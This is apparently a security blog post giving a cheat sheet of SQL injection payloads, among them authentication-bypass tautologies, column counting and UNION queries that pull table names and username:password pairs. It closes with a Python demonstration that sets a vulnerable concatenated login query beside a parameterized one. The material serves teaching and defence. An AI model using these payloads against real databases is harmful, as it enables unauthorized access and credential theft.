Some Basics of SQLi
Some common SQLi payloads that are important when performing an SQL injection attack:
General:
' or '1' = '1
' or '1' = '1'
' or '1' = '1 -- -
' or '1' = '1 #
1 UNION SELECT 1,2,3
For UNION Attack:
0 UNION SELECT 1,2,database()
0 UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'sqli_one'
0 UNION SELECT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_name = 'staff_users'
0 UNION SELECT 1,2,group_concat(username,':',password SEPARATOR '<br>') FROM staff_users
In-Blind SQL:
' OR 1=1; --
select * from users where username='' and password='' OR 1=1;
Bypass authentication:
SELECT a, b FROM table1 UNION SELECT c, d FROM table2
# Determine the number of columns
' ORDER BY 1 --
' ORDER BY 2 --
' ORDER BY 3 --
' UNION SELECT NULL --
' UNION SELECT NULL,NULL --
' UNION SELECT NULL,NULL,NULL --
Union attacks:
' UNION SELECT username || '~' || password FROM users --
# || is the concatenation operator, ~ is the separator
For Oracle Version:
'+UNION+SELECT+NULL,username||'~'||password+FROM+users --
For a UNION query to work, two key requirements must be met:
- The individual queries must return the same number of columns.
- The data types in each column must be compatible with the individual queries.
To carry out a SQL injection UNION attack, you need to ensure that your attack meets these two requirements. This generally involves figuring out:
- How many columns are being returned from the original query?
- Which columns returned from the original query are of a suitable data type to hold the results from the injected query?
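Added example (not part of the original post): the login query from above built by string concatenation next to its parameterized form, plus the UNION column-count rule, run against an in-memory SQLite database. The users table, its rows and all function names are constructed for this illustration, and SQLite stands in for the MySQL and Oracle targets the payloads above were written for.

```python
import sqlite3

def make_db():
    # Constructed sample table and rows, for this example only.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "alice", "s3cret"), (2, "bob", "hunter2")])
    return db

def login_vulnerable(db, username, password):
    # Input is pasted into the SQL text, so a quote in it changes the query.
    sql = ("SELECT id, username FROM users "
           "WHERE username='%s' AND password='%s'" % (username, password))
    return db.execute(sql).fetchall()

def login_parameterized(db, username, password):
    # Placeholders keep the input as data; it is never parsed as SQL.
    sql = "SELECT id, username FROM users WHERE username=? AND password=?"
    return db.execute(sql, (username, password)).fetchall()

def union_column_check(db, n_columns):
    # The database accepts a UNION only when both SELECTs return the
    # same number of columns; otherwise it raises an error.
    nulls = ",".join(["NULL"] * n_columns)
    try:
        db.execute("SELECT id, username FROM users UNION SELECT " + nulls)
        return True
    except sqlite3.OperationalError:
        return False

if __name__ == "__main__":
    db = make_db()
    payload = "' or '1' = '1"  # first payload from the General list
    print("concatenated :", login_vulnerable(db, "alice", payload))
    print("parameterized:", login_parameterized(db, "alice", payload))
    print("correct login:", login_parameterized(db, "alice", "s3cret"))
    print("UNION 1/2/3  :", [union_column_check(db, n) for n in (1, 2, 3)])
```

With the concatenated query the WHERE clause ends in or '1' = '1' and matches every row; with placeholders the same string is compared as a literal password and matches none.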
Happy Hacking H4ck3r😇
This is my Blog site: MyCyberSecurityJourney